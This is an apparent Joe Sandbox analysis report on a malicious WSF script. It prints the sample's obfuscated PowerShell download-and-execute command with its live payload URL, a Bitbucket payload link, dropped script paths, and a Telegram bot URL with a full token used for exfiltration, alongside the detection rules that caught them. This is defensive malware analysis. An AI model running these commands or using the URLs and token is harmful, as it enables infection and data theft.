Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FmmYUD4pt7.wsf

Overview

General Information

Sample name:FmmYUD4pt7.wsf
renamed because original name is a hash value
Original sample name:bba52d25f15d6fdad3016dd5943c794c.wsf
Analysis ID:1550368
MD5:bba52d25f15d6fdad3016dd5943c794c
SHA1:c358060b940da3c3c4bf636181ecaf0f9eccced5
SHA256:d1fccc8cfb43626be51e01591ab70748db228b5d41cf9fe6a75888135fdae6b4
Tags:wsfuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Powershell Download and Execute IEX
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7596 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 8104 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7184 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7232 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine|base64offset|contains: b, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7596, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, ProcessId: 7768, ProcessName: powershell.exe
Sigma detected: Powerup Write Hijack DLL
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7768, TargetFilename: C:\ProgramData\Documents\Visuals\VcEffect.bat
Sigma detected: Script Initiated Connection to Non-Local Network
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DesusertionIp: 185.166.143.49, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7596, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49725
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine|base64offset|contains: b, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7596, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, ProcessId: 7768, ProcessName: powershell.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs" , ProcessId: 8104, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine|base64offset|contains: b, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7596, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, ProcessId: 7768, ProcessName: powershell.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7768, TargetFilename: C:\ProgramData\Documents\Visuals\VcTurn.vbs
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 185.166.143.49, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7596, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49725
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", ProcessId: 7596, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine|base64offset|contains: b, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7596, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, ProcessId: 7768, ProcessName: powershell.exe
Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7768, TargetFilename: C:\ProgramData\Documents\Visuals\VcTurnOff.ps1

Data Obfuscation

barindex
Sigma detected: Powershell Download and Execute IEX
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, CommandLine|base64offset|contains: b, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7596, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);, ProcessId: 7768, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-06T17:32:17.745477+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949803TCP
2024-11-06T17:32:55.915062+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949976TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 84.32.84.136:443 -> 192.168.2.9:49777 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49840 version: TLS 1.2

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.166.143.49 443Jump to behavior
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: global trafficHTTP traffic detected: GET /moa/ HTTP/1.1Host: honeydew-raven-308531.hostingersite.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49803
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49976
Source: global trafficHTTP traffic detected: GET /xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 55Connection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /moa/ HTTP/1.1Host: honeydew-raven-308531.hostingersite.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: bitbucket.org
Source: global trafficDNS traffic detected: DNS query: honeydew-raven-308531.hostingersite.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 55Connection: Keep-Alive
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000003.00000002.1655169267.0000018DEE26C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.Tq
Source: powershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1656756949.0000018DEE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cok
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD838A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1625600487.0000018DD83B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/?format=text
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1625600487.0000018DD653D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE641A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE661E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org?format=text
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE641A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE661E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot$BotToken/sendMessage
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessagep
Source: wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
Source: wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: wscript.exe, 00000000.00000003.1407971588.00000280F38E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399915139.00000280F38F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402374098.00000280F38F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F38E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
Source: wscript.exe, 00000000.00000003.1407971588.00000280F38E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399915139.00000280F38F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402374098.00000280F38F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F38E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/Nt4
Source: wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399742893.00000280F56C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1403036395.00000280F56C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402220554.00000280F56C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1403138772.00000280F56C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408967806.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010
